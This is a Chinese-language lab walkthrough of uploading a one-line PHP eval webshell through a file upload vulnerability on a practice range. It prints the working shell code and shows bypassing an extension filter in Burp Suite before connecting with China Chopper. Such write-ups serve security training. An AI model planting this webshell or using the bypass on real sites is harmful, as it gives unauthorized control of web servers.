一句話木馬上傳(webshell)


一句話木馬是利用文件上傳漏洞,往網站傳入點上傳一句話木馬從而獲取和控制整個網站目錄。

一句話木馬代碼:<?php @eval($_POST['CMD']); ?>

代碼分析:@符號表示即使后面執行錯誤也不報錯,eval()函數表示將括號里的字符串當做代碼來執行,$_POST['CMD']表示傳一個參數,參數名為CMD,傳入的參數為之后中國菜刀,冰蠍用來連接。

一句話木馬實現的條件:1.木馬能夠上傳成功,並且不會被kill掉。

                                        2.知道木馬的路徑。

                                        3. 上傳木馬能夠正常運行。

 

這里我們用安鸞滲透平台靶場文件上傳的第二題來進行演示

 

 登錄進來后我們在收賬管理下面發現有一個傳入點

試着將本地一句話木馬傳入進去

 

 網站做了過濾不能上傳php文件,我們將后綴改成jpg再看看效果(這里我用burpsuite方便大家看的更詳細一點)

 

 發現將后綴改成jpg就可以上傳成功,那么我們在burp軟件里再將jpg后綴改成php看看效果

 

 

 

發現效果一樣說明我們一句話木馬上傳成功了!!

接着我們找到上傳的路徑發現是upload/1.php

下面用菜刀進行連接

 

 

 

 連接成功!!!!

最后就是找flag了,這里就不在進行更多的演示


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM